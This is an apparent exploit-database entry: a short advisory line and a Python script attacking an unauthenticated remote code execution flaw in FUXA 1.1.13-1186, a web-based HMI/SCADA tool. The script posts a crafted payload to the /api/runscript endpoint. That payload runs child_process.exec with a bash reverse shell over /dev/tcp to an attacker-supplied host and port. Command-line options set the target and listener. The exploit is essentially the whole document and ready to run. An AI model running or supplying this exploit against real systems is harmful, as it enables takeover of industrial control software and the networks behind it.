Headline
FUXA 1.1.13-1186 Remote Code Execution
FUXA version 1.1.13-1186 suffers from an unauthenticated remote code execution vulnerability.
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)# Date: 18/04/2023# Exploit Author: Rodolfo Mariano# Vendor Homepage: https://github.com/frangoteam/FUXA# Version: FUXA V.1.1.13-1186 (current)from argparse import RawTextHelpFormatterimport argparse, sys, threading, requestsdef main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload)args = Noneparser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')args=parser.parse_args()main(args.rhost, args.rport, args.lhost, args.lport)